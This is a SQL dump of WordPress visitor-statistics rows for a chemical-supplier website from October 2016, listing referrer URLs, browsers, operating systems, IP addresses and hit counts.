INSERT INTO `wp_statistics_visitor` VALUES (5910, '2016-10-18', 'https://r.search.yahoo.com/_ylt=Awr5.oyTfAZYgbgAFhNXNyoA;_ylu=X3oDMTByaWg0YW05BGNvbG8DYmYxBHBvcwM4BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1476848915/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=JoV3kjU64B9xq1Dz4esWb5MVHZE-', 'Firefox', 'Windows', '49.0', '', '74.142.135.194', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5911, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.33.224', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5912, '2016-10-18', 'https://search.yahoo.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.197.107.199', '000', 23, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5913, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '12.218.200.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5914, '2016-10-18', 'https://www.miller-stephenson.com/chemical-products/', 'MSIE', 'Windows', '9.0', '', '101.226.33.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5915, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.33.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5916, '2016-10-18', 'https://www.miller-stephenson.com/about-miller-stephenson/', 'MSIE', 'Windows', '9.0', '', '180.153.206.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5917, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.187', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5918, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.94', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5919, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.51.228', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5920, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '112.65.193.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5921, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.61.207', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5922, '2016-10-18', 'https://www.miller-stephenson.com/about-miller-stephenson/', 'MSIE', 'Windows', '9.0', '', '101.226.125.111', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5923, '2016-10-18', 'https://r.search.yahoo.com/_ylt=A0LEVxjFfgZYt9gAHgJXNyoA;_ylu=X3oDMTByNXQ0NThjBGNvbG8DYmYxBHBvcwM1BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1476849478/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fepi-rez-3522-w-60%2f/RK=0/RS=Ueovxmz89aPhRj9RxWoqsB8e9yw-', 'MSIE', 'Windows', '11.0', '', '4.15.169.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5924, '2016-10-18', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'MSIE', 'Windows', '9.0', '', '180.153.214.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5925, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.82', '', '205.145.193.6', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5926, '2016-10-18', 'https://www.miller-stephenson.com/chemicals/specialty-products/', 'MSIE', 'Windows', '9.0', '', '61.151.226.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5927, '2016-10-18', 'https://www.miller-stephenson.com/chemicals/specialty-products/', 'MSIE', 'Windows', '9.0', '', '61.151.226.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5928, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.26.164.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5929, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '180.153.214.192', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5930, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.65.102', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5931, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '61.151.218.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5932, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.66.174', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5933, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '180.153.201.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5934, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '10.192.145.46', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5935, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.240.158.249', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5936, '2016-10-18', 'https://www.bing.com/search?q=miller+stephenson&src=IE-SearchBox&FORM=IESR02', 'MSIE', 'Windows', '11.0', '', '74.142.135.194', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5937, '2016-10-18', 'https://www.miller-stephenson.com/miller-stephenson/', 'MSIE', 'Windows', '9.0', '', '180.153.214.188', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5938, '2016-10-18', 'https://www.miller-stephenson.com/miller-stephenson', 'MSIE', 'Windows', '9.0', '', '101.226.68.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5939, '2016-10-18', 'https://www.miller-stephenson.com/miller-stephenson', 'Chrome', 'Windows', '45.0.2454.101', '', '61.151.226.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5940, '2016-10-18', 'https://www.miller-stephenson.com/about-miller-stephenson/', 'MSIE', 'Windows', '9.0', '', '101.226.102.97', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5941, '2016-10-18', 'https://www.miller-stephenson.com/articles/', 'Chrome', 'Windows', '45.0.2454.101', '', '101.226.33.200', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5942, '2016-10-18', 'https://www.miller-stephenson.com/conformal-coating/', 'MSIE', 'Windows', '9.0', '', '101.226.66.180', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5943, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '23.226.95.147', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5944, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.89.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5945, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '101.226.33.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5946, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '180.153.81.212', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5947, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '98.180.195.203', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5948, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '65.55.213.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5949, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '37.21.119.236', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5950, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjJstP5leXPAhWKej4KHfifBuoQFgghMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw', 'MSIE', 'Windows', '11.0', '', '198.175.154.212', '000', 62, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5951, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '71.183.136.252', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5952, '2016-10-18', 'https://www.google.com/url?url=https://www.miller-stephenson.com/product/epikure-3125/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwjtuoKJluXPAhVE9h4KHZmKCB0QFggbMAE&usg=AFQjCNGd9AFKHV4jIaRJ7sJ7iEXye3pKCw', 'MSIE', 'Windows', '9.0', '', '63.88.113.186', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5953, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.187.0.112', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5954, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '194.44.224.224', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5955, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '79.45.2.212', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5956, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '93.185.28.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5957, '2016-10-18', 'https://www.google.co.nz/', 'Chrome', 'Windows', '53.0.2785.143', '', '130.123.103.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5958, '2016-10-18', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&frm=1&source=web&cd=1&sqi=2&ved=0ahUKEwiZ2uflmOXPAhUI92MKHZYQARIQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.cGc', 'MSIE', 'Windows', '10.0', '', '207.228.71.76', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5959, '2016-10-18', 'https://www.google.com/', 'Firefox', 'Windows', '1.0.2', '', '160.20.9.88', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5960, '2016-10-18', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '67.80.237.193', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5961, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5962, '2016-10-18', 'https://mmr.mschem.com/miller/pdf/MS-111.pdf', 'Chrome', 'Windows', '54.0.2840.59', '', '130.207.141.188', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5963, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.199', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5964, '2016-10-18', 'https://www.miller-stephenson.com', 'PHPCrawl', 'Unknown', 'Unknown', '', '5.13.73.127', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5965, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.75.180.148', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5966, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwi0kdLEnOXPAhWEPCYKHSiBB7IQFgg2MAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fepikure-3245%2F&usg=AFQjCNF908umLOyWRixx8F2dBdMb4-pz0w', 'MSIE', 'Windows', '11.0', '', '4.16.99.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5967, '2016-10-18', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '38.101.196.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5968, '2016-10-18', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-teflon-lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-grease/', 'Safari', 'iPhone', '7.0', '', '131.253.27.140', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5969, '2016-10-18', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '47.21.139.146', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5970, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '70.183.25.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5971, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '9.0', '', '99.255.82.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5972, '2016-10-18', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.35.210.3', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5973, '2016-10-18', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.3', '', '128.115.190.35', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5974, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwj-wqj2oeXPAhVGh1QKHS0dC6MQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA&bvm=bv.135974163,d.cGw', 'MSIE', 'Windows', '11.0', '', '199.48.185.53', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5975, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '199.197.244.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5976, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '185.54.179.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5977, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.95.218.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5978, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.143', '', '207.228.71.76', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5979, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.107.186.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5980, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '78.25.123.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5981, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.243.8.215', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5982, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '108.59.127.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5983, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=www.miller-stephenson.com&source=web&cd=5&ved=0CF0QFjAE&url=https:%2F%2Fwww.miller-stephenson.com%2Fmiller%2Fconformal.html&cad=rja', 'Lynx', 'Unknown', '2.8.5rel.1', '', '78.158.11.226', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5984, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '217.18.139.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5985, '2016-10-18', '50.62.30.35/web-console/ServerInfo.jsp', 'MSIE', 'Windows', '9.0', '', '113.204.53.134', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5986, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5987, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.58.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5988, '2016-10-18', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '192.31.242.195', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5989, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '176.58.115.37', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5990, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '24.37.77.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5991, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '205.214.239.118', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5992, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.93', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5993, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.122', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5994, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '193.33.63.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5995, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '137.79.208.241', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5996, '2016-10-18', 'https://www.miller-stephenson.com', 'Ruby', 'Unknown', 'Unknown', '', '104.197.113.175', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5997, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.142.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5998, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '141.189.142.1', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (5999, '2016-10-18', 'https://www.mschem.com/miller/index.php', 'Chrome', 'Windows', '54.0.2840.59', '', '32.218.126.183', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6000, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '123.125.67.220', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6001, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.148.60.111', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6002, '2016-10-18', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.169.188.184', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6003, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.41.123.47', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6004, '2016-10-18', 'https://komp-pomosch.ru/', 'Opera', 'Windows', '7.11', '', '46.118.155.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6005, '2016-10-18', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCwQFjAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2Fvertrel%2F&ei=6qoGWMCwFoHPQNdj&usg=AFQjCNHb06o1qEUMWWwyPw2EGjHda1K7WQ', 'Chrome', 'Android', '53.0.2785.124', '', '66.102.6.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6006, '2016-10-18', 'https://www.miller-stephenson.com/chemicals/solvents/vertrel/', 'Chrome', 'Android', '53.0.2785.124', '', '66.102.6.149', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6007, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '50.0.2661.102', '', '99.165.85.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6008, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '46.99.37.207', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6009, '2016-10-18', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '70.209.147.56', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6010, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '7.0', '', '72.235.197.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6011, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '205.214.239.118', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6012, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.190.102.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6013, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '206.202.88.34', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6014, '2016-10-18', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.139.246.41', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6015, '2016-10-18', 'https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agents/', 'Safari', 'iPad', '10.0', '', '24.193.212.151', '000', 19, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6016, '2016-10-18', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '50.149.165.70', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6017, '2016-10-18', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.226.206.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6018, '2016-10-18', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjQ4cmnxuXPAhXCEpQKHY4qD4oQFggfMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135974163,d.dGo', 'MSIE', 'Windows', '11.0', '', '210.105.10.212', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6019, '2016-10-18', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.11', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6020, '2016-10-19', 'https://www.miller-stephenson.com/wp-admin/admin.php?page=quoteup-details-new', 'Chrome', 'Windows', '53.0.2785.143', '', '107.3.95.149', '000', 716, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6021, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '205.214.239.118', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6022, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '55.0.2883.11', '', '76.185.113.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6023, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.198.186.191', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6024, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '46.99.37.207', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6025, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.174.34.222', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6026, '2016-10-19', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '70.139.48.119', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6027, '2016-10-19', 'https://www.miller-stephenson.com/', 'Chrome', 'Macintosh', '39.0.2171.95', '', '104.168.85.117', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6028, '2016-10-19', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '104.168.85.117', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6029, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.15.182.147', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6030, '2016-10-19', 'https://odessa.mistr-x.org/', 'Opera', 'Windows', '7.02', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6031, '2016-10-19', 'https://www.miller-stephenson.com', 'Mechanize', 'Unknown', '2.7.2', '', '54.185.106.253', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6032, '2016-10-19', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '221.4.214.18', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6033, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '94.25.172.232', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6034, '2016-10-19', 'https://www.google.com/search?q=ptfe+release+agents&oq=ptfe+release+agents&gs_l=mobile-heirloom-serp.12...0.0.6.6918.0.0.0.0.0.0.0.0..0.0....0...1c..34.mobile-heirloom-serp..6.21.3140.MsI0f_HXiRA', 'Firefox', 'Android', '49.0', '', '174.199.14.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6035, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.110.44.153', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6036, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6037, '2016-10-19', 'https://www.miller-stephenson.com/conformal-coating/', 'Safari', 'iPad', '10.0', '', '24.193.212.151', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6038, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '68.46.109.223', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6039, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.168.81.7', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6040, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '50.0', '', '129.10.9.73', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6041, '2016-10-19', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '204.124.152.10', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6042, '2016-10-19', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6043, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.198', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6044, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.110', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6045, '2016-10-19', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.49.28.255', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6046, '2016-10-19', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '98.184.64.17', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6047, '2016-10-19', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwje05684-XPAhWDi5QKHS70CTkQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-gpl-214%2F&usg=AFQjCNG3BOszqFGM39-Kd9hAkg9ouFKoJA&bvm=bv.135974163,d.dGo', 'MSIE', 'Windows', '11.0', '', '219.101.218.61', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (6048, '2016-10-19', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '10.0.648.204', '', '209.95.190.132', '000', 2, 0); 
